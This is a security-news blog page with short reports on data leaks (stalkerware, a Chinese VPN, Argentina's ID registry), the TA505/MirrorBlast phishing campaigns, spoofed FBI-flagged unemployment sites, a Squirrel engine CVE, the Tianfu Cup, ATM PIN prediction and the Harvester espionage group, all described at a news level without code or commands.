Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

User Privacy
Data Leak Mobile Security Mobile Spyware Stalkerware User Privacy

Thousands of Users Smartphone Data Leaked by a Stalkerware

 

Hundreds of thousands of users' sensitive phone data is in danger. Due to a security flaw in commonly deployed consumer spyware, call logs, text messages, pictures, browser history, accurate geolocations, and call recordings might be easily retrieved from a user's phone. 

TechCrunch regularly emailed the developer, whose name is unknown, using all available and non-public email accounts, but still, the lines of inquiry to uncover the problem have fallen by the wayside. 

Attempts have been made to approach the spyware creator since the security and privacy of thousands of people are jeopardized until the issue is resolved. The spyware or its creator hasn't been identified since doing so would simplify things for cybercriminals to access users' private vulnerable data. 

The security vulnerability was found as part of a broader consumer spyware study by TechCrunch. These programs, which are frequently advertised as kid tracking or monitoring software, are also known as "stalkerware" due to their capacity to follow and spy on people without their knowledge. Such spyware programs discreetly and continually redirect a person's phone contents, allowing its owner to follow a person's movements and whom they communicate with. Most people will be unaware that their smartphones have been hacked because these applications are intended to disappear from home screens to evade discovery or deletion. 

TechCrunch further reached out to Codero, the web business that hosts the developer's spyware technology, but the company didn't answer numerous requests seeking comment. Codero is no newcomer to stalkerware hosting; in 2019, the web host "took action" against stalkerware producer Mobiispy after it was discovered spewing thousands of pictures and audio recordings. 

“I’m disappointed, but not even a little surprised,” Eva Galperin, director of cybersecurity for the Electronic Frontier Foundation. “I think we could reasonably characterize this type of behavior as negligent. Not only do we have a company that is making a product that enables abuse, but they are doing such a poor job of protecting the information that is being exfiltrated that they are opening the targets of this abuse to even greater abuse." 

Due to the obvious widespread availability of this simple-to-obtain malware, an industry-wide campaign was launched to combat it. Antivirus companies have tried to enhance the detection of stalkerware, and Google has also prohibited spyware companies from marketing their wares as a method to spy on a spouse's phone, but some developers are employing innovative techniques to circumvent the prohibition. 

Mobile spyware has a long history of security issues. Over a dozen stalkerware companies, including mSpy, Mobistealth, Flexispy, and other Family orbits, have been discovered to have been hijacked, leaked data, or compromised data on people's phones in recent times. 

KidsGuard, another stalkerware, had a security issue that revealed information on thousands of people's phones, and, more recently, pcTattleTale, which advertises itself as competent in spying on a spouse's device, was exposing screenshots via easy-to-guess URL addresses. 

The Federal Trade Commission prohibited SpyFone, a stalkerware software that also revealed the phone data of over 2,000 users, in September and required users to be notified that their devices had been compromised.
Read more »
VPN
China Data Breach Sensitive data United States User Data User Secuirty VPN

One Million Users were Exposed Due to a VPN Provider's Misconfiguration

 

A misconfigured Elasticsearch server exposed the personally identifiable information (PII) of at least one million users of a Chinese-run VPN provider. According to WizCase, the privacy concern impacts Quickfox, a free VPN used mostly by the Chinese diaspora to access sites that are otherwise inaccessible from outside mainland China. Unfortunately, Fuzhou Zixun Network Technology, the owner of Quickfox, had not properly set up its Elastic Stack security, leaving an Elasticsearch server unprotected and accessible — with no password protection or encryption in place. 

Ata Hakcil headed a team of ethical cyber researchers who discovered a serious leak that exposed Quickfox's ElasticSearch server. The leak was caused by a security flaw in the ELK stack. Elasticsearch, Logstash, and Kibana (ELK) are three open-source applications that make searching enormous files easier, such as the logs of an online service like Quickfox. 

Quickfox had put up access controls in Kibana, but they hadn't done the same for their Elasticsearch server. Anyone with a browser and an internet connection might gain access to Quickfox records and extract sensitive information about Quickfox users. 

Around 500 million records totaling over 100GB of data were exposed as a result of the incident. There were primarily two categories of data in the information. The personal information of around 1 million users was the first type. The second type concerned software installed on over 300,000 users' devices. The documents discovered were all dated between June 2021 and September 2021. 

According to the IP addresses discovered in the breach, it mostly affected individuals in the United States, as well as countries bordering China, such as Japan, Indonesia, and Kazakhstan. 

Customers' emails, IP addresses, phone numbers, data to identify device kind, and MD5 hashed passwords were among the PII revealed. MD5 is far from safe, according to WizCase, and can be cracked with modern technology. This would have been enough for criminals to use phishing emails, vishing phone calls, and other methods to obtain further sensitive information such as credit card or bank account numbers.

“The leaked information about device type and installed software could make this con very convincing,” warned WizCase. “It’s unclear why the VPN was collecting this data, as it is unnecessary for its process and it is not standard practice seen with other VPN services.” 

Cyber-criminals could try to hijack other accounts across the web by unmasking MD5 hashed passwords and using credential stuffing tactics, WizCase said. It advised consumers to thoroughly vet VPN providers before selecting one and to be aware that free services may benefit from the collection and use of client data.
Read more »
User Privacy
Argentina Data Breach Government Database Personal Data User Privacy

Hacker Steals Private Details of Thousands of Argentine Citizens

 

An anonymous hacker has reportedly breached the Argentinian government’s IT network and put up on sale the private details of thousands of Argentineans. 

Last month, the hacker targeted Argentina’s National Registry of Persons a.k.a. RENAPER, responsible for issuing ID cards to all citizens with data stored in digital formats as a database accessible to government agencies for queries on any citizen’s private information. The agency is a crucial cog in most government queries for citizen’s personal information. 

According to a report by The Record, the first evidence of breach surfaced earlier this month on Twitter when a newly registered account named @AnibalLeaks published ID card photos and private details for 44 Argentinian celebrities which included famous footballers Lionel Messi Sergio Aguero and Argentina’s president Alberto Fernandez. Now, the hacker is evidently looking for a buyer to sell the private details of Argentina’s entire population. 

The leaked data includes names, home addresses, birthdays, Trámite numbers, citizen numbers, government photo IDs, labor identification codes, ID card issuance and expiration dates. There have been speculations that a VPN from someone within the Ministry of Health had been used to access the Digital Identity System right before the Twitter account leaked the initial data on the high-profile Argentines. However, the law enforcement agencies are currently investigating eight to ten employees about having a possible role in this serious cybercrime. 

“The black market for stolen data is big business, and cybercriminals will stop at nothing to find their next big payday. This attack should be a warning to governments: cybercriminals have the means to execute large-scale, sophisticated attacks, and their citizens' data is under threat," Tony Pepper, CEO of cybersecurity firm Egress Pepper said. 

"With the data of millions at risk, Argentinian citizens are now prime targets for follow-up attacks, such as financial fraud, sophisticated phishing attempts and impersonation scams, aimed at stealing further personal data, identities and even their money." 

According to security experts, this is one of the biggest breaches in the history of Argentina where the private details of 45 million Argentinian people have been put at great risk. Cybercrime is evolving and the government should strengthen their security protocols to protect its integrity.
Read more »
TA505 Gang
Cyber Security CyberCrime Ransomware RAT TA505 Gang

TA505 Gang is Back in the Wild

 

According to business security software vendor Proofpoint, TA505, a prominent email phishing threat actor, has risen from the grave. TA505, which had been inactive since 2020, resumed mass emailing efforts in September, equipped with fresh malware loaders and a RAT. 

The TA505 cybercrime organization has restarted its financial rip-off apparatus, bombarding malware at a variety of sectors into what are originally low-volume waves that researchers noticed spike late last month. 

The group, which aggressively targets a variety of businesses such as finance, retail, and hotels, has been functional since at least 2014. It is well-known for rapid virus changes and for influencing worldwide trends in illegal malware dissemination. 

It is responsible for one of the firm's largest spam efforts, the spread of the Dridex banking malware. Proofpoint has also identified the organization that is delivering the Locky and Jaff ransomware, the Trick banking trojan, and other malware "in very high volumes," according to the company. 

According to habit, the gang's most recent ads span a wide spectrum of sectors. They're additionally bringing new tools, such as an improved KiXtart loader, the MirrorBlast loader, which downloads Rebol script stagers, the retooled FlawedGrace RAT, and improved malicious Excel files.

Proofpoint researchers tracked renewed malware campaigns from TA505 that began slowly at the start of September – only with a few thousand emails per wave, disseminating malicious Excel attachments – and afterward ramped up the volume later in the month, resulting in tens to hundreds of thousands of emails by the end of September, according to an analysis published by the company. 

As per the report, several of the efforts, especially the larger ones, "strongly resemble" what the group was up to between 2019 and 2020, involving identical domain naming patterns, email lures, Excel file lures, and the distribution of the FlawedGrace RAT. TA505 utilized more targeted lures in the early September waves of email attacks, which didn't impact as many sectors as the more recent October 2021 operations, according to Proofpoint experts. 

Significant new advancements include an updated FlawedGrace RAT, as well as retooled intermediate loader phases written in Rebol and KiXtart. According to experts, the gang is utilizing a different downloader than the previously successful Get2 downloader. 

“The new downloaders perform similar functionality of reconnaissance and pulling in the next stages,” Proofpoint researchers noted. 

“The emails contained an Excel attachment that, when opened and macros enabled, would lead to the download and running of an MSI file,” Proofpoint said. MSI files are used to install software on a Windows system. “The MSI file, in turn, would execute an embedded Rebol loader, dubbed by Proofpoint as MirrorBlast.” 

Researchers also discovered that TA505 is now employing numerous intermediary loaders before the distribution of the FlawedGrace RAT, and they are written in unusual scripting languages — Rebol and KiXtart. 

The intermediary loaders appear to fulfill the very same purpose as Get2, a downloader used by TA505 since 2019 to distribute a range of secondary payloads, according to researchers. 

“The loaders perform minimal reconnaissance of an infected machine, such as collecting user domain and username information and downloading further payloads,” according to the research. 

“The code responsible for downloading the next stage MSI file was typically lightly obfuscated with filler characters, string reversing or similar simple functions and hidden in the document Comments, Title, in a Cell or other locations,” the researchers noted. 

Considering that TA505 alters TTP and is "considered a trendsetter in the world of cybercrime," Proofpoint does not anticipate them going anywhere any time soon. The malicious actors do not restrict its target set and are, in fact, an equal opportunist in terms of the regions and sectors it chooses to attack, researchers said. This, along with TA505's capacity to be adaptable, focusing on what is most profitable and altering its TTP as needed, makes the actor persistent threat.
Read more »
Spoofing
Cyber Fraud Data Privacy Fake Sites Financial Data Fraud Schemes Government Sites Spoofing

FBI: Fake Government Websites Used to Steal Private & Financial Data

 

The FBI has alerted the public in the United States that threat actors are proactively capturing sensitive financial and personal information from innocent victims via phoney and fraudulent unemployment benefit websites. 

Websites used in these assaults are built to seem just like official government platforms in order to deceive victims into giving over their information, infecting them with malware, and claiming unemployment benefits on their behalf. 

The federal law enforcement agency stated in a public service announcement published on Internet Crime Complaint Center's site, "These spoofed websites imitate the appearance of and can be easily mistaken for legitimate websites offering unemployment benefits. The fake websites prompt victims to enter sensitive personal and financial information. Cyber actors use this information to redirect unemployment benefits, harvest user credentials, collect personally identifiable information, and infect victim's devices with malware.” 

"In addition to a loss of benefits, victims of this activity can suffer a range of additional consequences, including ransomware infection and identity theft." 

As per the FBI, 385 domains were detected, with eight of them spoofing government sites related to official unemployment benefits platforms. Domain and status are listed below:
  • employ-nv[.]xyz:  Active 
  • employ-wiscon[.]xyz: Inactive 
  • gov2go[.]xyz : Active 
  • illiform-gov[.]xyz : Active 
  • mary-landgov[.]xyz : Active 
  • Marylandgov[.]xyz: Inactive 
  • newstate-nm[.]xyz:  Active 
  • Newstatenm[.]xyz: Inactive 
There is also a possibility that the data obtained through these fake sites will end up in the hands of identity fraudsters, who would use it in different benefit fraud schemes. The US Federal Trade Commission (FTC) reported in February 2021 that the overall number of identity theft reports doubled in 2020 compared to 2019, with 1.4 million reports in a single year. 

The FTC stated, "2020’s biggest surge in identity theft reports to the FTC related to the nationwide dip in employment. After the government expanded unemployment benefits to people left jobless by the pandemic, cybercriminals filed unemployment claims using other people’s personal information." 

For example, the FTC received 394,280 reports of government benefits fraud attempts last year, the majority of which were connected to unemployment benefit identity theft fraud, compared to 12,900 reported in 2019. 

The Internal Revenue Service (IRS) also issued taxpayer guidelines in January on recognizing theft activities involving unemployment payments. The US federal revenue service stated, "The Internal Revenue Service today urged taxpayers who receive Forms 1099-G for unemployment benefits they did not actually get because of identity theft to contact their appropriate state agency for a corrected form." 

"Additionally, if taxpayers are concerned that their personal information has been stolen and they want to protect their identity when filing their federal tax return, they can request an Identity Protection Pin (IP PIN) from the IRS." 

The FBI also offered some advice on how to safeguard yourself against identity theft in the release and a few are listed below: 
  • To identify limitations, the spelling of web addresses should be verified. 
  • Check that the website you're visiting has an SSL certificate. 
  • Software upgrades are required; 
  • It is recommended that two-factor authentication be utilized. 
  • Avoid phishing emails at all costs.
Read more »
Technology News
Crypto Currency Technology Technology News

Russian oil companies offer to use their fields for mining cryptocurrencies

Russian oil companies have offered to use Russian equipment at their fields for mining cryptocurrencies. They proposed using associated petroleum gas (APG) for these purposes, with the help of which electricity will be generated to supply data centers needed for mining. The project has been sent for consideration to the Ministry of Industry and Trade, the Ministry of Digital Development, Communications and Mass Media and the Central Bank of the Russian Federation.

It is reported that one of the major Russian oil companies would like to scale its cryptocurrency mining project, but this segment is in a legally gray zone, and the company is afraid of a negative reaction from the Central Bank, so it turned to the Ministry of Industry and Trade, which can discuss the risks with the regulator.

The Ministry of Industry and Trade reported that the project is being discussed with regulators. In accordance with the law “On Digital Financial Assets”, the procedure for the circulation of digital currency should be regulated by separate laws. According to the Central Bank, approaches to regulation are currently being discussed.

Experts consider the proposal controversial. On the one hand, there is the gas that is unprofitable for transportation, from which electricity can be obtained. On the other hand, this business is non-core and costly for oil companies, since they will have to pay for the maintenance of data centers.

Although there is no legal ban on mining in Russia, cryptocurrency cannot be exchanged or used as a means of payment. Therefore, according to experts, it is possible that oil companies will provide excess capacity for investors from China, where mining is prohibited.

It is worth noting that officially only Gazprom Neft has a mining project: in 2020, the company launched it at its field in Khanty-Mansiysk JSC. For a month, the company's partners managed to get 1.8 BTC. Gazprom Neft declined to comment.

Read more »
Game Hacking
attackers Cloud based services Cyber Security Game Hacking

Attackers Could Use a Bug in the Squirrel Engine to Hack Games and Cloud Services

 

An out-of-bounds read vulnerability in the Squirrel programming language allows attackers to bypass sandbox limitations and execute arbitrary code within a Squirrel virtual machine (VM), giving them complete control over the underlying machine. Given where Squirrel lives – in games and embedded in the internet of things (IoT), the bug could endanger the millions of monthly gamers who play video games like Counter-Strike: Global Offensive and Portal 2, as well as cloud services like the Twilio Electric Imp IoT platform, which has an open-source code library that is ready to use. 

The issue is tracked as CVE-2021-41556, and it affects stable release branches 3.x and 2.x of Squirrel. It occurs when a gaming library known as Squirrel Engine is used to execute untrusted code. On August 10, 2021, the vulnerability was responsibly disclosed. The Squirrel Engine was designed to be a model for multi-core gaming engine efficiency. It's designed to get the most out of high-end computer hardware. 

Squirrel is an open-source object-oriented programming language used for customization and plugin development in video games and cloud applications. It's a scripting language that fits the size, memory bandwidth, and real-time demands of video games and embedded systems. 

"In a real-world scenario, an attacker could embed a malicious Squirrel script into a community map and distribute it via the trusted Steam Workshop," researchers Simon Scannell and Niklas Breitfeld said in a report. "When a server owner downloads and installs this malicious map onto his server, the Squirrel script is executed, escapes its VM, and takes control of the server machine." 

When defining Squirrel classes, the security problem involves "out-of-bounds access via index confusion." The fact that bitflags are set within indexes is problematic since it is absolutely conceivable for an attacker to establish a class definition with 0x02000000 methods, the researchers explained. 

The flaw is severe because it allows a malicious actor to create a false array that can read and write values. The researchers discovered that overwriting function pointers allowed them to "hijack the control flow of the programme and take full control of the Squirrel VM." 

While the problem was fixed as part of a code commit on September 16, the modifications have yet to be included in a new stable release, with the most recent official version (v3.1) being issued on March 27, 2016. Maintainers that utilize Squirrel in their projects should apply the available repair commit to protect themselves from assaults, according to the researchers who found the issue.
Read more »
Mobile Security
China Chinese Hackers Hacking Competition Mobile Security

Chinese Researchers Hack iPhone 13 Pro in Record Time

 

Cyber security researchers from China won $1.88 million after hacking some of the world’s most popular software at the annual Tianfu Cup, the fourth edition of the international hacking contest held in the city of Chengdu, China. 

The Tianfu Cup is similar to Pwn2Own where participants get rewarded for exploiting vulnerabilities in widely used software and hardware. It was created in the wake of government regulation in the country that restricted researchers from participating in international hacking competitions. The first edition was held in autumn 2018 where security researchers successfully hacked Edge, Chrome, Safari, iOS, Xiaomi, Vivo, VirtualBox, and other devices.

This year’s edition took place over the weekend on October 16 and 17, where the Kunlun Lab team, whose CEO is a former CTO of Qihoo 360, hacked the iPhone 13 Pro operating on a fully patched version of iOS 15.0.2 in record time. The iPhone 13 Pro was hacked live on stage using a remote code execution exploit of the mobile Safari web browser. However, Kunlun Lab wasn't the only team to hack the iPhone 13 Pro. Team Pangu, which has a history of Apple device jailbreaking, also hacked a fully patched iPhone 13 Pro running iOS 15, but took a few extra minutes.

The other targets included Google Chrome operating on Windows 10 21H1, Adobe PDF Reader, Docker CE, Ubuntu 20/CentOS 8, Microsoft Exchange Server 2019, Windows 10, VMware Workstation, VMware ESXi, Parallels Desktop, Apple Safari running on Macbook Pro, iPhone 13 Pro running iOS 15, domestic mobile phones running Android, QEMU VM, Synology DS220j DiskStation, and ASUS RT-AX56U router. 

The hacking contest saw three independent and parallel competitions. The competitions included PC, mobile, and server, and eight categories: Virtualization Software, Operating System Software, Browser Software, Office Software, Mobile Intelligent Devices, Web Services, and Applications Software, DNS Services Software, and Common Management Services Software.

The hacking competition also included a separate trade show and cybersecurity conference, which this year was presented by Qi Xiangdong, chairman of security firm QiAnXin, and also included sections dedicated to smart vehicle security, IoT security, artificial intelligence security, and smart city security.
Read more »
User Privacy
ATM ATM Security attackers Cyber Fraud User Privacy

Hiding ATM Pad Gives Less Protection Against Attackers: States Research

 

While using a credit card or cash card for money withdrawal from an ATM, users must provide their unique PIN. A careful individual might conceal the keypad with their hand as they input it so that nobody else learns their PIN, although even if they hide the keypad with their hand, it is possible to predict the PIN with good accuracy using a machine learning technique. 

Recently, investigations have indicated that it is viable to program a special-purpose deep-learning system to predict 4-digit card PINs 41% of the time, even when the victim is shielding the keypad with their hands. The attack necessitates the establishment of a copy of the target ATM since training the algorithm for the exact size and key spacing of the various PIN pads is critical. 

Utilizing footage of individuals inputting PINs on the ATM pad, the machine-learning model is then taught to detect pad presses and give particular probability on a set of possibilities. The researchers collected 5,800 recordings of 58 different people from various demographics inputting 4-digit and 5-digit PINs for the research. 

The prediction model was run on a Xeon E5-2670 having 128 GB of RAM and three Tesla K20m with 5GB of RAM each. Not any typical system, but probably within a reasonable cost range. 

The researchers rebuilt the right sequence for 5-digit PINs 30 percent of the time using three tries, which is generally the maximum allowed number of attempts before the card is blocked, and 41 percent of the time for 4-digit PINs. 

The model may omit keys based on non-typing hand coverage and derive pushed digits from other hand motions by calculating the topological distance between two keys. 

The positioning of the camera that catches the attempts is critical, particularly when filming left or right-handed people. The attacker concluded that concealing a pinhole camera at the top of the ATM was indeed the best choice. However, if the camera can capture audio as well, the model might employ pressing sound feedback that is slightly different for every digit, making the estimates much more precise. 

This experiment demonstrates that concealing the PIN keypad with the other hand is insufficient to guard against deep learning-based assaults, but there are several alternatives one may use. 

For instance, if the bank allows users to select a 5-digit PIN rather than a 4-digit PIN, go with the lengthier one. It will be more difficult to remember, but it is far more secure against any such attacks. Furthermore, the proportion of hand covering considerably reduces prediction accuracy. A coverage ratio of 75% results in an accuracy of 0.55 for each trial, whereas entire coverage (100%) results in an accuracy of 0.33. 

Another alternative would be to provide customers with a virtual and randomized keypad rather than the conventional mechanical one. This has unavoidable usability problems, but it is a great security precaution.
Read more »
phishing
Antivirus Cyber Data Cyber Fraud Excel File Fake Emails Financial Sector Fraud Website Malware Distribution MirrorBlast phishing

This New Phishing Attack Uses a Weaponized Excel File

 

A new phishing campaign is targeting financial sector employees by using links to download a ‘weaponized’ Excel document.

MirrorBlast, a phishing effort, was discovered in early September by security firm ET Labs. Morphisec, a fellow security firm, has now studied the malware and warns that the malicious Excel files might escape malware-detection systems due to "extremely lightweight" embedded macros, making it especially risky for businesses that rely on detection-based protection and sandboxing. 

Macros, or scripts for automating activities, have grown in popularity among cybercriminals. Despite the fact that macros are disabled by default in Excel, attackers employ social engineering to deceive potential victims into allowing macros. Despite appearing to be a simple approach, macros have been employed by state-sponsored hackers because they frequently work. 

Microsoft earlier this year extended its Antimalware Scan Interface (AMSI) for antivirus to combat the rise in macro malware and a recent phenomenon by attackers to utilise outdated Excel 4.0 XLM macros (rather than newer VBA macros) to circumvent anti-malware systems. 

As per Morphisec, the MirrorBlast attack chain is similar to tactics used by TA505, a well-established, financially focused Russia-based cybercriminal group. The group has been active since at least 2014 and is well-known for its usage of a wide range of tools. 

Morphisec researcher Arnold Osipov stated in a blog post, "TA505 is most known for frequently changing the malware they use as well as driving global trends in malware distribution." 

While the MirrorBlast attack begins with a document attached to an email, it afterwards uses a Google feed proxy URL with a SharePoint and OneDrive trap that masquerades as a file-sharing request. When the user clicks the URL, they are sent to a hacked SharePoint site or a bogus OneDrive site. Both versions will take to the malicious Excel document. 

The sample MirrorBlast email demonstrates how the attackers are capitalising on company-issued data on COVID-related modifications to working conditions. Morphisec points out that due to compatibility issues with ActiveX components, the macro code can only be run on a 32-bit version of Office. The macro itself runs a JavaScript script meant to avoid sandboxing by determining if the computer is in administrator mode. The msiexec.exe process is then launched, which downloads and instals an MSI package. 

Morphisec discovered two MIS installation versions that employed legal scripting tools named KiXtart and REBOL. The KiXtart script transmits information about the victim's workstation to the attacker's command and control server, including the domain, computer name, user name, and process list. It then answers with a number indicating whether the Rebol version should be used. Morphisec states that the Rebol script leads to a remote access tool called FlawedGrace, which the group has previously utilised. 

Osipov added, "TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals." 
Read more »
Telecom Firms
Backdoor Custom Malware Cyber Attacks Security Researchers Telecom Firms

State-Backed Harvester Group is Going After Telecommunications Providers

 

Researchers discovered a previously unidentified state-sponsored actor that appears to be conducting cyberattacks against South Asian telecommunications companies and IT corporations using a unique combination of technologies. The goal of the cybercrime gang is considered to be data collection. They use highly focused espionage efforts that target IT, telecom, and government organizations. Harvester is a new threat actor with no known adversaries, as the attacker's damaging tools have never been encountered before in the wild.

"The Harvester group uses both custom malware and publicly available tools in its attacks, which began in June 2021, with the most recent activity seen in October 2021. Sectors targeted include telecommunications, government, and information technology (IT)," Symantec researchers said. "The capabilities of the tools, their custom development, and the victims targeted, all suggest that Harvester is a nation-state-backed actor."

Backdoor appears to be used by the attackers. Metasploit, Graphon, Custom Downloader, Custom Screenshotter, Cobalt Strike Beacon are some of them. Although Symantec researchers were unable to determine the initial attack vector, evidence of a malicious URL being exploited for that purpose was identified.

By blending command-and-control (C2) communication activity with actual network traffic from CloudFront and Microsoft infrastructure, the Graphon backdoor gives the attackers remote network access and covers their existence. The custom downloader's functionality is impressive, as it can create critical system files, add a registry value for a new load-point, and start an embedded web browser at hxxps:/usedust[.]com.

Despite the fact that it appears to be the Backdoor, the actors are only using the URL as a ruse to create confusion, but Graphon is being retrieved from this address. The custom screenshot application captures screenshots of the desktop and saves them to a password-protected ZIP folder, which Graphon then steals. Each ZIP file is kept for a week before being automatically deleted. 

While there isn't enough proof to link Harvester's activities to a single nation-state, the group's use of custom backdoors, intensive efforts to conceal its harmful activity, and targeting all point to it being a state-sponsored actor, according to Symantec researchers. Given the recent upheaval in Afghanistan, the campaign's targeting of organizations in that nation is also intriguing. Harvester's activities make it evident that the goal of this campaign is espionage, which is a common incentive for nation-state-backed action, the researchers added.
Read more »
Subscribe to: Comments (Atom)